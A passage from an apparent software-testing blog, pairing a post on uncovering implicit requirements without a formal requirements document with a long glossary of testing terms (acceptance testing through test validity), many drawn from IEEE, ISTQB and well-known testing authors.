Wednesday, May 6, 2009

How can I design test cases, if I don't have a Requirements Document?

How can I design test cases, if I don't have a Requirements Document?"

But, there are ALWAYS requirements - even if they are not formally documented. They may take some time to discover and list, but they exist. Here's one approach to finding those "hidden" requirements.

First, look for general requirements and work to document them. Some of these requirements come from previous versions of the application, some come from generally accepted usage. For example:
1. Must run on platforms x,y,z (perhaps because those platforms have always been supported)
2. Must use abc database
3. Must be able to process n records in m seconds
4. Must be at least as fast as release n - 1
5. Must not consume more memory (or other resources) than release n - 1
6.Must not crash
7. Must not corrupt data
8. Must use standards relevant to the platform (standard Windows UI, for example)
9.Must not have any misspellings
10. Must be grammatically correct
11.Must incorporate the company's usual look-and-feel
12.Must be internally consistent
13.Must work in particular locales
14.Must be complete when expected by the stakeholders (perhaps for some event, such as a Beta)
If it's a web site or application, some additional requirements might include:
1. Must not be missing any images
2. Must not have any broken links
3. Must bascially work the same in all browsers which are officially supported by the company
Then, interview the project manager or developers and find out what they intend to do with this release. Document the intentions and use them as requirements.
Solicit input from anyone who is a stakeholder in the project. Share everything you find with everyone and revise it as needed.
Sometimes, writing all of this up as assumptions can go a long way toward gaining a consensus as to the "real requirements" you can use to test against.

Once the system is at all testable, do some exploratory testing. As you find "undocumented features", add them to the list of topics to be discussed.

Find out if the product is internally consistent. (This is an area I find to be very useful) Even if I know nothing at all about a product, I assume it must be consistent within itself, and within the environment in which it must operate.

Look for external standards within which the product must operate. If it is a tax or accounting program - tax law must prevail and generally accepted accounting principles must apply.

Ideally, all of these issues have already been considered and written into the formal Requirements documentation which is handed to you. But if not, don't give up. Dig in and discover!

Tuesday, May 5, 2009

A Glossary of Testing Terms

Acceptance Criteria
The exit criteria that a component or system must satisfy in order to be accepted by a user, customer, or other authorized entity. [IEEE]
Acceptance Testing
The process of the user testing the system and, based on the results, either granting or refusing acceptance of the software/system being tested. [wikipedia]
The process of comparing the program to its initial requirements and the current needs of its end users. It is an unusual type of test in that it is usually performed by the program's customer or end user, and normally is not considered the responsibility of the development organization. [G. Myers]
Testing to verify readiness for implementation or use.
Formal testing conducted to determine whether or not a system satisifies its acceptance criteria and to enable the customer to determine whether or not to accept the system. [B. Hetzel]
Accessibility Testing
Verifying a product is accessible to the people having disabilities
Ad-Hoc Testing
The process of improvised, impromptu bug searching. [J. Bach]
Agile Testing
Testing practice for projects using agile methodologies, such as extreme programming (XP), treating development as the customer of testing and emphasizing a test-first design paradigm. See also Test Driven Development. [ISTQB]
Alpha Testing
Testing conducted internally by the manufacturer, alpha testing takes a new product through a protocol of testing procedures to verify product functionality and capability. In-house testing. This is the period before Beta Testing.
In-house testing performed by the test team (and possibly other interested, friendly insiders). [C. Kaner, et al]
Anomaly
Any condition that deviates from expectation based on requirements specifications, design documents, user documents, standards, et, or from someone's perception or experience. Anolmalies may be found during, but not limited to, reviewing, testing, analysis, compliation, or use of software prducts or applicable documentation. [IEEE]
Application Under Test
(AUT) The application which is the target of the testing process.
Audit
An independent evaluation of softwre products or processes to ascertain compliance to standards, guidelines, specification, and/or procedures based on objective criteria, including documents that specify:
(1) the form or content of the products to be produced
(2) the process by which the products shall be produced
(3) how compliance to standards or guidelines shall be measured [IEEE]
Audit Trail
A path by which the original input to a process (e.g. data) can be traced back through the process, taking the process output as a starting point. This facilitates defect analysis and allows a process audit to be carried out. [ISTQB]
Automated Testing
Testing which is performed, to a greater or lesser extent, by a computer, rather than manually.
Availability
The degree to which a component or system is operational and accessible when required for use. Often expressed as a percentage. [IEEE]
Back-to-Back Testing
Testing in which two or more variants of a component or system are executed with the same inputs, the outputs compared, and analyzed in cases of discrepancies. [IEEE]
Baseline
A specification or software product that has been formally reviewed or agreed upon, that thereafter serves as the basis for further development, and that can be changed only through a formal change control process. [IEEE]
More generally, a baseline is a set of observations or values that represent the background level of some measurable quantity. Once a baseline is established, variations to that baseline can be measured after something in the system is changed.
Behavioral Testing
Some people confuse "black box" testing with "behavioral" testing. I am amused to be able to cite the IEEE standards (several of them) and SWEBOK (the IEEE's Software Engineering Body of Knowledge) as agreeing with my definition. (Makes me wonder whether I should adopt a different definition.) When you do behavioral testing, you specify your tests in terms of externally visible inputs, outputs, and events. However, you can use any source of information in the design of the tests. The behavioral tester will use information gained by reading the source code or internal design specs if that is readily available. The black box tester will not. The strength of the black box approach is that it drives the black box tester to develop understanding and expertise in areas that are probably different from the programmer, and therefore the tester will think in different ways and probably imagine and catch problems that don't occur to the programmer. [C. Kaner]
Benchmark Test
(1) A standard against which measurements or comparisons can be made. (2) A test that is to be used to compare components or systems to each other or to a standard as in (1). [IEEE]
Bespoke Software
See - Custom Software
Beta Testing
Testing conducted at one or more customer sites by the end-user of a software product or system . This is usually a "friendly" user and the testing is conducted before the system is made generally available.
A type of user testing that uses testers who aren't part of your organization and who are members of your product's target market. The product under test is typically very close to completion. [C. Kaner, et al]
Black Box Testing
Black box testing refers to testing that is done without reference to the source code or other information about the internals of the product. The black box tester consults external sources for information about how the product runs (or should run), what the product-related risks are, what kinds of errors are likely and how the program should handle them, and so on. [C. Kaner]
Blink Testing
Looking for overall patterns of unexpected changes, rather than focusing in on the specifics. For example, rapidly flipping between two web pages which are expected to be the same. If they are not the same, differences stand out visibly. Or, rapidly scrolling through a large log file, looking for unusual patterns of log messages.
Boundary Value
In the context of a software program, a boundary value is a specific value at the extreme edges of an independent linear variable or at the edge or edges of equivalence class subsets of an independent linear variable. [Bj Rollison]
Boundary Value Analysis
Guided testing which explores values at and near the minimum and maximum allowed values for a particular input or output.
Branch Coverage
The percentage of branches that have been exercised by a test suite. 100% branch coverage implies both 100% decision coverage and 100% statement coverage. [ISTQB]
Bug
A computer bug is an error, flaw, mistake, failure, or fault in a computer program that prevents it from working correctly or produces an incorrect result. Bugs arise from mistakes and errors, made by people, in either a program's source code or its design. It is said that there are bugs in all useful computer programs, but well-written programs contain relatively few bugs, and these bugs typically do not prevent the program from performing its task. ... [wikipedia]
Bug Bash
In-house testing using secretaries, programmers, marketers, and anyone who is available. A typical bug-bash lasts a half-day and is done when the software is close to being ready to release. [C. Kaner, et al]
Bug Triage or Bug Crawl or Bug Scrub
A meeting or discussion focused on an item-by-item review of every active bug reported against the system under test. During this review, fix dates can be assigned, insignificant bugs can be deferred, and project management can assess the progress of the development process. Also called a bug scrub. [R. Black]
Build Verification Test (BVT) or Build Acceptance Test (BAT)
A set of tests run on each new build of a product to verify that the build is testable before the build is released into the hands of the test team. This test is gernerally a short set of tests, which exercise the mainstream functionality of the application software.
Capability Maturity Model (CMM)
A five level staged framework that describes the key element of an effective software process. The Capability Maturity Model covers best-practices for planning, engineering and managing software development and maintenance. [CMM]
Capability Maturity Model Integration (CMMI)
A framework that describes the key elements of an effective product development and maintenance process. The Capability Maturity Model Integration covers best-practices for planning, engineering and managing product development and maintenance. CMMI is the designated successor of the CMM. [CMMI]
Capacity Testing
Testing to determine the maximum users a computer or set of computers can support. [A. Page]
Cause-And-Effect Diagram
A diagram used to depict and help analyze factors causing an overall effect. Also called a Fishbone Diagram or Ishikawa Diagram.
Churn
Churn is a term used to describe the amount of changes that happen in a file or module over a selected period.

Clear Box Testing
See: Glass Box Testing
Code Coverage
An analysis method that determines which parts of the software have been executed (covered) by the test suite and which parts have not been executed, e.g. statement coverage, decision coverage or condition coverage. [ISTQB]
Code Freeze
The point in time in the development process in which no changes whatsoever are permitted to a portion or the entirety of the program's source code. [wikipedia]
Command Line Interface (CLI)
In Command line interfaces, the user provides the input by typing a command string with the computer keyboard and the system provides output by printing text on the computer monitor. [wikipedia]
Commercial Off-The-Shelf Software (COTS)
A software product that is developed for the general market, i.e. for a large number of customers, and that is delivered to many customers in identical format. [ISTQB]
Component Testing
Component testing is the act of subdividing an object-oriented software system into units of particular granularity, applying stimuli to the component’s interface and validating the correct responses to those stimuli, in the form of either a state change or reaction in the component, or elsewhere in the system. [M. Silverstein]
Compliance
The capability of the software product to adhere to standards, conventions or regulations in laws and similar prescriptions. [ISTQB]
Compliance Testing
The process of testing to determine the compliance of the component or system. [ISTQB]
Concurrency Testing
Testing to determine how the occurrence of two or more activities within the same interval of time, achieved either by interleaving the activities or by simultaneous execution, is handled by the component or system. [IEEE]
Configuration Management
A discipline applying technical and administrative direction and surveillance to: identify and document the functional and physical characteristics of a configuration item, control changes to thise characteristics, record and report change processing and implementation status, and verify compliance with specified requirements. [IEEE]
Critical Path
A series of dependent tasks for a project that must be completed as planned to keep the entire project on schedule. [SEI]
Cross-Site Scripting
Cross site scripting (XSS) is a type of computer security exploit where information from one context, where it is not trusted, can be inserted into another context, where it is. From the trusted context, an attack can be launched. Note that although cross site scripting is also sometimes abbreviated "CSS", it has nothing to do with the Cascading Style Sheets technology that is more commonly called CSS. [wikipedia]
Cyclomatic Complexity
Cyclomatic complexity is the most widely used member of a class of static software metrics. Cyclomatic complexity may be considered a broad measure of soundness and confidence for a program. Introduced by Thomas McCabe in 1976, it measures the number of linearly-independent paths through a program module. [SEI]
Daily Build
A development activity where a complete system is complied and linked every day (usually overnight) so that a consistent system is available at any time including all latest changes. [ISTQB]
Data-Driven Testing
Testing in which the actions of a test case is parameterized by externally defined data values, often maintained as a file or spreadsheet. This is a common technique in Automated Testing.
A scripting technique that stores test inputs and expected outcomes as data, normally in a table or spreadsheet, so that a single control script can execute all of the tests in the data table. [M. Fewster]
Debugging
The process in which developers determine the root causeof a bug and identify possible fixes. Developers perform debugging activities to resolve a known bug either after development of a subsystem or unit or because of a bug report. [R. Black]
Decision Coverage
The percentage of decision outcomes that have been exercised by a test suite. 100% decision coverage implies both 100% branch coverage and 100% statement coverage. [ISTQB]
Defect
A flaw in a component or system that can cause the component or system to fail to perform its required function, e.g. an incorrect statement or data definition. A defect, if encountered during execution, may cause a failure of the component or system. [ISTQB]
Defect Density
The number of defects identified in a component or system divided by the size of the component or system (expressed in standard measurement terms, e.g. lines-of-code, number of classes or function points). [ISTQB]
Defect Leakage Ratio (DLR)
The ratio of the number of defects which made their way undetected ("leaked") into production divided by the total number of defects.
Defect Masking
An occurrence in which one defect prevents the detection of another. [IEEE]
Defect Prevention
The activities involved in identifying defects or potential defects and preventing them from being introduced into a product. [SEI]
Defect Rejection Ratio (DRR)
The ratio of the number of defect reports which were rejected (perhaps because they were not actually bugs) divided by the total number of defects.
Defect Removal Efficiency (DRE)
The ratio of defects found during development to total defects (including ones found in the field after release).
Deviation
A noticeable or marked departure from the appropriate norm, plan, standard, procedure, or variable being reviewed. [SEI]
Direct Metric
A metric that does not depend upon a measure of any other attribute [IEEE]
Distributed Testing
Testing that occurs at multiple locations, involves multiple teams, or both. [R. Black]
Domain
The set from which valid input and/or output values can be selected. [ISTQB]
Driver
A software component or test tool that replaces a component that takes care of the control and/or the calling of a component or system. [ISTQB]
Eating Your Own Dogfood
Your company uses and relies on pre-release versions of its own software, typically waiting until the software is reliable enough for real use before selling it. [C. Kaner, et al]
Entry Criteria
A set of decision-making guidelines used to determing whether a system under test is ready to move into, or enter, a particular phase of testing. Entry criteria tend to become more rigorous as the test phases progress. [R. Black]
Equivalence Partition
A portion of an input or output for which the behavior of a component or system is assumed to be the same, based on the specification. [ISTQB]
Error Guessing
A test design technique where the experience of the tester is used to anticipate what defects might be present in the component or system under test as a result of errors mafe, and to design tests specifically to expose them. [ISTQB]
Error Seeding
The process of intentionally adding known defects to those already in the component or system for the purpose of monitoring the rate of detection and removal, and estimating the number of remaining defects. [ISTQB]
Exit Criteria
A set of decision-making guidelines used to determing whether a system under test is ready to exit a particular phase of testing. When exit criteria are met, either the system under test moves on to the next test phase or the test project is considered complete. Exit criteria tend to become more rigorous as the test phases progress. [R. Black]
Exhaustive Testing
A test approach in which the test suite comprises all combinations of input values and preconditions. [ISTQB]

Exploratory Testing
Test design and test execution at the same time. This is the opposite of scripted testing (predefined test procedures, whether manual or automated). Exploratory tests, unlike scripted tests, are not defined in advance and carried out precisely according to plan. Exploratory testing is sometimes confused with "ad hoc" testing. [J. Bach]
Exploratory software testing is a style of software testing that emphasizes the personal freedom and responsibility of the individual tester to continually optimize the value of her work by treating test-related learning, test design, test execution, and test result interpretation as mutually supportive activities that run in parallel throughout the project. [Kaner, Bach, Bolton, et al]
Simultaneous (or parallel) test design, test execution and learning. [Bolton]
Extreme Programming (XP)
Extreme Programming (XP) is a method or approach to software engineering and the most popular of several agile software development methodologies. It was formulated by Kent Beck, Ward Cunningham, and Ron Jeffries. Kent Beck wrote the first book on the topic, Extreme programming explained: Embrace change, published in 1999. ... [wikipedia]
Failure Mode
A particular way, in terms of symptons, behaviors, or internal state changes, in which a failure manifests itself. For example, a heat dissipation problem in a CPU might cause a laptop case to melt or warp, or memory mismanagement might cause a core dump. [R. Black]
Failure Mode and Effect Analysis (FMEA)
A systematic approach to risk identification and analysis of identifying possible modes of failure and attempting to prevent their occurrence [ISTQB]
Falsification
The process of evaluating an object to demonstrate that it does not meet requirements. [B. Beizer]
Fault Injection
The process of intentionally incorporating errors in code in order to measure the ability (of the tester, or processes) to detect such errors.
Fault Model
An engineering model of something that could go wrong in the construction or operation of a piece of equipment. [wikipedia] This can be extended to software testing, as a model of the types of errors that could occur in a system under test.
Fault Tolerance
The capability of the software product to maintain a specified level of performance in cases of software faults (defects) or of infringement of its specified interface. [ISO 9126]
Feature
A desirable behavior of an object; a computation or value produced by an object. Requirements are aggregates of features. [B. Beizer]
Feature Freeze
The point in time in the development process in which all work on adding new features is suspended, shifting the effort towards fixing bugs and improving the user experience. [wikipedia]
First Customer Ship (FCS)
The period which signifies entry into the final phase of a project. At this point, the product is considered wholly complete and ready for purchase and usage by the customers. It may precede the phase where the product is manufactured in quality and ready for General Availability (GA).
Fishbone Diagram
A diagram used to depict and help analyze factors causing an overall effect. Also called a Cause-And-Effect Diagram or Ishikawa Diagram.
Formal Testing
Process of conducting testing activities and reporting test results in accordance with an approved test plan. [B. Hetzel]
Functional Requirements
An initial definition of the proposed system, which documents the goals, objectives, user or programmatic requirements, management requirements, the operating environment, and the proposed design methodology, eg, centralized or distributed.
Functional Testing
Process of testing to verify that the functions of a system are present as specified. [B. Hetzel]
Testing requiring the selection of test scenarios without regard to the structure of the source code. [J. Whittaker]
Fuzz Testing
A software testing technique that provides random data ("fuzz") to the inputs of a program. If the program fails (for example by crashing or by failing built-in code assertions), the defects can be noted. The great advantage of fuzz testing is that the test design is extremely simple, and free of preconceptions about system behavior. [wikipedia]
Gap Analysis
An assessment of the difference between what is required or desired, and what actually exists.
General Availability (GA)
The phase in which the product is complete, and has been manufactured in sufficient quantity such that is ready to be purchased by all the anticipated customers.
Glass Box Testing
Glass Box testing (aka "White Box", but who can see through white boxes? They're just as opaque as black ones) is about testing with thorough knowledge of the code. The programmer might be the person who does this. I have seen members of independent test groups do this type of testing. Some risks are invisible to the black box tester but not too hard to see in the source, such as weak error handling, a weak model of interrupt-triggering events, excessive coupling of different parts of the program, etc. The test groups that do this type of work **usually** specialize one or a few people who do nothing but read the source code looking for interesting / risky areas and then designing thorough tests to exploit those risks. (I say "usually" because some languages, like COBOL, are so well designed for readability that evaluation of the source code is done by most of the members of the test team. Many of the books and papers on testing that talk to you as if it's obvious that you're going to design your tests after reading the source code, were written in the context of business applications coded in COBOL.) [C. Kaner]
Gray Box Testing
A combination of Black Box and White Box testing. Testing software against its specification but also using some knowledge of its internal workings.
Happy Path
A default scenario that features no exceptional or error conditions. A well-defined test case that uses known input, that executes without exception and that produces an expected output. [wikipedia]
Simple inputs that should always work. [A. Page]
IEEE 829 (829 Standard for Software Test Documentation)
An IEEE standard which specifies the format of a set of documents used in software testing. These documents are Test Plan, Test Design Specification, Test Case Specification, Test Procedire Specification, Test Item Transmittal Report, Test Log, Test Incident Report, and Test Summary Report. [IEEE]
Incident
An operational event that is not part of the normal operation of a system. It will have an impact on the system, although this may be slight or transparent to the users. [wikipedia]
Incident Report
A document reporting on any event that occurred, e.g. during the testing, which requires investigation. [IEEE 829]
Incremental Testing
A disciplined method of testing the interfaces between unit-tested programs as well as between system components. Two types of incremental testing are often mentioned: Top-down and Bottom up.
Independent V&V
Verification and validation of a software product by an independent organization (other than the designer). [B. Hetzel]
Input Masking
Input masking occurs when a program throws an error condition on the first invalid variable and subsequent values are not tested. [Bj Rollison]
Inspection
A formal evaluation technique involving detailed examination by a person or group other than the author to detect faults and problems.
Integration Testing
Integration testing is the phase of software testing in which individual software modules are combined and tested as a group. It follows unit testing and precedes system testing. [wikipedia]
An orderly progression of testing in which software and/or hardware elements are combined and tested until the entire system has been integrated. [B. Hetzel]
The testing of multiple components that have each received prior and separate unit testing. [J. Whittaker]
Interface Testing
Testing conducted to ensure that the program or system components pass information and control correctly.
Internationalization
Internationalization (I18N) is the process of designing and coding a product so it can perform properly when it is modified for use in different languages and locales.
Ishikawa Diagram
A diagram used to depict and help analyze factors causing an overall effect, named after Kaoru Ishikawa. Also called a Fishbone Diagram or Cause-And-Effect Diagram.
Keyword-Driven Testing
A scripting technique that uses data files to contain not only test inputs and expected outcomes, but also keywords related to the application being tested. The keywords are interpreted by special supporting scripts that are called by the control script for the test. [M. Fewster]
Kludge (or kluge)
Any ill-advised, substandard, or "temporary" bandage applied to an urgent problem in the (often misguided) belief that doing so will keep a project moving forward. [R. Black]
Link Rot
The process by which links on a website gradually become irrelevant or broken as time goes on, because websites that they link to disappear, change their content or redirect to new locations. [Wikipedia]
Load Testing
Load testing is subjecting a system to a statistically representative (usually) load. The two main reasons for using such loads is in support of software reliability testing and in performance testing. [B. Beizer]
Localization
Localization (L10N) refers to the process, on a properly internationalized base product, of translating messages and documentation as well as modifying other locale specific files.
Low-resource Testing
Low-resource testing determines what happens when the system is low or depleted of a critical resource such as physical memory, hard disk space, or other system-defined resources. [A. Page]
Maintainability
Maintainability describes the effort needed to make changes in software without causing errors. [A. Page]

MEGO
Acronym for My Eyes Glazed Over; refers to a loss of focus and attention, often caused by an attempt to read a particularly impenetrable or dense technical document. [R. Black]
Memory Leak
A particular type of unintentional memory consumption by a computer program where the program fails to release memory when no longer needed. This condition is normally the result of a bug in a program that prevents it from freeing up memory that it no longer needs. [Wikipedia]
Method
A reasonably complete set of rules and criteria that establish a precise and repeatable way of performing a task and arriving at a desired result. [SEI]
Methodology
A collection of methods, procedures, and standards that defines an integrated synthesis of engineering approaches to the development of a product. [SEI]
Metric
A quantitative measure of the degree to which a system, component, or process possesses a given attribute [IEEE]
The assignment of a numeric value to an object or event according to a rule derived from a model or theory. [C. Kaner]
Milestone
A scheduled event for which some individual is accountable and that is used to measure progress. [SEI]
Monkey Testing
Pounding away at the keyboard with presumably random input strings until something breaks. [B. Beizer]
Mutation Testing
With mutation testing, the system/program under test is changed to create a faulty version called a mutant. You then run the mutant program through a suite of test cases, which should produce new test case failures. If no new failures appear, the test suite most likely does not exercise the code path containing the mutated code, which means the program isn't fully tested. You can then create new test cases that do exercise the mutant code. [J. McCaffrey]
Negative Testing
Testing whose primary purpose is falsification; that is testing designed to break the software. (also called Dirty Testing) [B. Beizer]
Non-functional Testing
Testing the attributes of a component or system that do not relate to functionality, e.g. reliability, efficiency, usability, maintainability and portability. [ISTQB]
Oracle
Any means used to predict the outcome of a test. [W. Howden]
The mechanism which can be used to compare the actual output that the application under test produces with the expected output. [J. Whittaker]
Operational Testing
Testing by the end user on software in its normal operating environment (DOD). [B. Hetzel]
Pareto Analysis
The analysis of defects by ranking causes from most significant to least significant. Pareto analysis is based on the principle, named after the 19th-century economist Vilfredo Pareto, that most effects come from relatively few causes, i.e. 80% of the effects come from 20% of the possible causes. [SEI]
Performace Evaluation
The assessment of a system or component to determine how effectively operating objectives have been achieved. [B. Hetzel]
Performace Testing
Testing conducted to evaluate the compliance of a system or component with specified performance requirements. [IEEE]
Testing that attempts to show that the program does not satisfy its performance objectives. [G. Myers]
Positive Testing
Testing whose primary purpose is validation; that is testing designed to demonstrate the software's correct working. (also called Clean Testing) [B. Beizer]
Priority
Priority indicates when your company wants a particular bug fixed. Priorities change as a project progresses.
Prototype
A prototype of software is an incomplete implementation of software that mimics the behavior we think the users need. [M.E. Staknis]
Pseudo-random
A series which appears to be random but is in fact generated according to some prearranged sequence. [ISTQB]
Quality
The ability of a set of inherent characteristics of a product, system or process to fulfil requirements of customers and other interested parties [ISO 9000:2000]
Conformance to requirements or fitness for use. Quality can be defined through five principal approaches: (1) Transcendent quality is an ideal, a condition of excellence. (2) Product-based quality is based on a product attribute. (3) User-based quality is fitness for use. (4) Manufacturing-based quality is conformance to requirements. (5) Value-based quality is the degree of excellence at an acceptable price. Also, quality has two major components: (1) quality of conformance—quality is defined by the absence of defects, and (2) quality of design—quality is measured by the degree of customer satisfaction with a product’s characteristics and features. [North Carolina State University]
Quality means "meets requirements". [B. Hetzel]
The degree to which a component, system or process meets specified requirements and/or user/customer needs and expectattions. [ISTQB]
Quality Factor
A management-oriented attribute of software that contributes to its quality. [IEEE]
Quality Gate
A milestone in a project where a particular quality level must be achieved before moving on.
Rainy-Day Testing
Checking whether a system adequately prevents, detects and recovers from operational problems such as downed network connections, data bases which become unavailable, equipment failures and operator errors. [R. Stens]
Recoverability
The capability of the software product to re-establish a specified level of performance and recover the data directly affected in case of failure. [ISTQB]
Regression Testing
Regression testing is that testing that is performed after making a functional improvement or repair to the program. Its purpose is to determine if the change has regressed other aspects of the program. It is usually performed by rerunning some subset of the program's test cases. [G. Myers]
Selective testing to verify that modifications have not caused unintended adverse side effects or to verify that a modified system still meets requirements. [B. Hetzel]
Release Candidate
A Release Candidate is a build of a product undergoing final testing before shipment. All code is complete, and all known bugs which should be fixed, have already been fixed. Unless a critical, show-stopper bug is found during this final phase, the Release Candidate becomes the shipping version.
Release Test (or Production Release Test)
Tests designed to ensure that the code (which has already been thoroughly tested and approved for release) is correctly installed and configured in Production. This is often a fairly quick test, but may involve some migration tests as well.
Reliability
The ability of the software product to perform its required functions under stated conditions for a specified period of time, or for a specified number of operations. [ISTQB]
Repetiton Testing (Duration Testing)
A simple, brute force technique of determining the effect of repeating a function or scenario. The essence of this technique is to run a test in a loop until reaching a specified limit or threshold, or until an undesirable action occurs. [A. Page]
Requirement
A condition or capability needed by a user to solve a problem or achieve an objective. [B. Hetzel]
Requirements
That which an object should do and/or characteristics that it should have. Requirements are arbitrary but they must still be consistent, reasonably complete, implementable, and most important of all, falsifiable. [B. Beizer]
Re-testing
Testing that runs test cases that failed the last time they were run, in order to verify the success of corrective actions. [ISTQB]
Risk
Possibility of suffering loss. [SEI]
Robustness
The degree to which a system or component can function correctly in the presence of invalid inputs or stressful environmental conditions. [IEEE]
Root Cause
The underlying reason why a bug occurs, as opposed to the observed symptoms of the bug. Root cause data is most useful in the aggregate: analyzing a breakdown of the root causes of all bugs found in a system under test can help to focus the attention of noth test and development on those areas that are causing the most serious and frequent problems. [R. Black]
Sanity Testing
A quick test of the main portions of a system to determine if it is basically operating as expected, but avoiding in-depth testing. This term is often equivalent to Smoke Testing.
Scalability
The ability to scale to support larger or smaller volumes of data and more or less users. The ability to increase or decrease size or capability in cost-effective increments with minimal impact on the unit cost of business and the procurement of additional services.
The ability of a software system to cope, as the size of the problem increases.
Severity
Severity refers to the relative impact or consequence of a bug, and usually doesn't change unless you learn more about some hidden consequences.
Smart Monkey Testing
In Smart Monkey Testing, input are generated from probability distributions that reflect actual expected usage statistics -- e.g., from user profiles. There are different levels of IQ in smart monkey testing. In the simplest, each input is considered independent of the other inputs. That is, a given test requires an input vector with five components. In low IQ testing, these would be generated independently. In high IQ monkey testing, the correlation (e.g., the covariance) between these input distribution is taken into account. In all branches of smart monkey testing, the input is considered as a single event. [T. Arnold]
Smoke Test
A subset of all defined/planned test cases that cover the main functionality of a component or system, to ascertain that the most crucial functions of a program work, but not bothering with finer details. A daily build and smoke test is among industry best practices. [ISTQB]
Soak Testing
Testing a system with a significant load extended over a significant period of time, to discover how the system behaves under sustained use. [wikipedia]
Software Audit
An independent review for the purpose of assessing compliance with requirements, specifications, standards, procedures, codes, contractual and licensing requirements, and so forth.
Software Error
Human action that results in software that contains a fault that, if encountered, may cause a failure. [B. Hetzel]
Software Failure
A departure of system operation from specified requirements dr to a software error. [B. Hetzel]
Software Quality
The totality of features and characteristics of a software product that bears on its ability to satisfy given needs. [B. Hetzel]
Software Quality Assurance
The function of software quality that assures that the standards, processes, and procedures are appropriate for the project and are correctly implemented. [NASA.gov]
Software Reliability
Probability that software will not cause the failure of a system for a specified time under specified conditions. [B. Hetzel]
Specification
A tangible, usually partial expression of requirements. Examples: document, list of features, prototype, test suite. Specifications are usually incomplete because many requirements are understood. For example, "the software will not crash or corrupt data." The biggest mistake a tester can make is to assume that all requirements are expressed by the specification. [B. Beizer]
A statement of a set of requirements to be satisfied by a product. [B. Hetzel]
SQL Injection
SQL injection is a hacking technique which attempts to pass SQL commands through a web application's user interface for execution by the backend database.
Standard
Mandatory requirements emplyed and enforced to prescribe a disciplined uniform approach to software development. [SEI]
Statement Coverage
The percentage of executable statements that have been exercised by a test suite. [ISTQB]
Statement Of Work
A description of all the work required to complete a project, which is provided by the customer. [SEI]
Static Analysis
Analysis of software artifacts, e.g. requirements or code, carried out without execution of these software artifacts. [ISTQB]
Stress Testing
Stress testing involves subjecting the program to heavy loads or stresses. This should not be confused with volume testing; a heavy stress is a peak volume of data encountered over a short span of time. [G. Myers]
String Testing
A software development test phase that finds bugs in typical usage scripts and operational or control-flow "strings". This test phase is fairly unusual. [R. Black]
Structural Testing
Structural testing is sometimes confused with glass box testing. I don't think you can do black box structural testing, but I think the focus of structural testing is on the flow of control of the program, testing of different execution paths through the program. I think that there are glass box techniques that focus on data relationships, interaction with devices, interpretation of messages, and other considerations that are not primarily structural. [C. Kaner]
Testing whch requires that inputs be drawn based solely on the structure of the source code or its data structures. Structural testing is also called code-based testing and white-box testing. [J. Whittaker]
Stub
A skeletal or special-purpose implementation of a software component, used to develop or test a component that calls or is otherwise dependent on it. It replaces a called component. [IEEE]
Sunny-Day Testing
Positive tests. Tests used to demonstrate the system's correct working.
SWAG
Acronym for Scientific Wild-Ass Guess; an educated guess or estimate. SWAGs abound in test scheduling activities early in the development process. [R. Black]
System Reliability
Probability that a system will perform a required task or mission for a specified time in a specified environment. [B. Hetzel]
System Testing
System Testing is done to explore system behaviors that can't be done by unit, component, or integration testing. Example, testing: performance, installation, data integrity, storage management, security, reliability. Ideal system testing presumes that all components have been previously, successfully, integrated. System testing is often done by independent testers. [B. Beizer]
Testing of groups of programs.
Process of testing an integrated system to verify that it meets specified criteria. [B. Hetzel]
The testing of a collection of components that constitutes a deliverable product. [J. Whittaker]
System Under Test
(SUT) The system which is the target of the testing process.
Test
The word test is derived from the Latin word for an earthen pots or vessel (testum). Such a pot was used for assaying materials to determine the presence or measure the weight of various elements, thus the expression "to put to the test." [B. Hetzel]
An activity in which a system or component is executed under specified conditions, the results are observed or recorded, and an evaluation is made of some aspect of the system or component. [IEEE]
Test and Evaluation
As employed in the DOD, T & E is the overall activity of independent evaluation "conducted throughout the system acquistion process to assess and reduce acquisition risks and to estimate the operational effectiveness and suitability of the system being developed." [B. Hetzel]
Test Bed
An execution environment configured for testing. May consist of specific hardware, OS, network topology, configuration of the product under test, other application or system software, etc. The Test Plan for a project should enumerated the test beds(s) to be used.
Test Case
A set of test inputs, execution conditions, and expected results developed for a particular objective, such as to exercise a particular program path or to verify compliance with a specific requirement.
A specific set of test data along with expected results for a particular test objective, such as to exercise a program feature or to verify compliance with a specific requirement. [B. Hetzel]
Test Case Specification
A document specifying the test data for use in runnng the test conditions identified in the Test Design Specification. [IEEE]
Test Condition
A test condition is a particular behavior that you need to verify of the system under test.
Test Data
Data that is run through a computer program to test the software.
Input data and file conditions associated with a particular test case. [B. Hetzel]
Test Design
A selection and specification of a set of test cases to meet the test objectives or coverage criteria. [B. Hetzel]
Test Design Specification
A document detailing test conditions and the expected results as well as test pass criteria. [IEEE]
Test-Driven Development
Test-driven development (TDD) is a programming technique heavily emphasized in Extreme Programming. Essentially the technique involves writing your tests first then implementing the code to make them pass. The goal of TDD is to achieve rapid feedback and implements the "illustrate the main line" approach to constructing a program. [wikipedia]
Test Environment
The hardware and software environment in which tests will be run, and any other software with which the software under test interacts when under test including stubs and test drivers.
Test Harness
A test environment comprised of stubs and drivers needed to execute a test. [ISTQB]
Test Incident Report
A document detailing, for any test that failed, the actual versus expected result, and other information intended to throw light on whu a test has failed. [IEEE]
Test Item Transmittal Report
A document reporting on when tested software components have progressed from one stage of testing to the next. [IEEE]
Test Log
A chronological record of all relevant details of a testing activity. [B. Hetzel]
A document recording which test cases were run, who ran them, in what order, and wheter each test passed or failed. [IEEE]
Test Plan
A document describing the scope, approach, resources, and schedule of intended testing activities. It identifies test items, the features to be tested, the testing tasks, who will do each task, and any risks requiring contingency planning. [IEEE]
A detail of how the test will proceed, who will do the testing, what will be tested, in how much time the test will take place, and to what quality level the test will be performed. [IEEE]
A document prescribing the approach to be taken for intended testing activities. [B. Hetzel]
Test Procedure
A document defining the steps required to carry out part of a test plan or execute a set of test cases. [B. Hetzel]
Test Procedure Specification
A document detailing how to run each testing, including any set-up preconditions and the steps that need to be followed. [IEEE]
Test Script
A document, program, or object that specifies for every test and subtest in a test suite: object to be tested, requirement (usually a case), initial state, inputs, expected outcome, and validation criteria.
Test Suite
A set of one or more tests, usually aimed at a single object, with a common purpose and data base, usually run as a set. [B. Beizer]
Test Summary Report
A management report providing any important information uncovered by the tests accomplished, and including assessments of the quality of the testing effort, the quality of the software system under test, and statistics derived from the Incident Reports. [IEEE]
Test Tool
A software product that supports one or more test activities, such as planning and control, specification, building initial files and data, test execution and test analysis. [ISTQB]
Test Validity
The degree to which a test accomplishes its specified goal
Testability
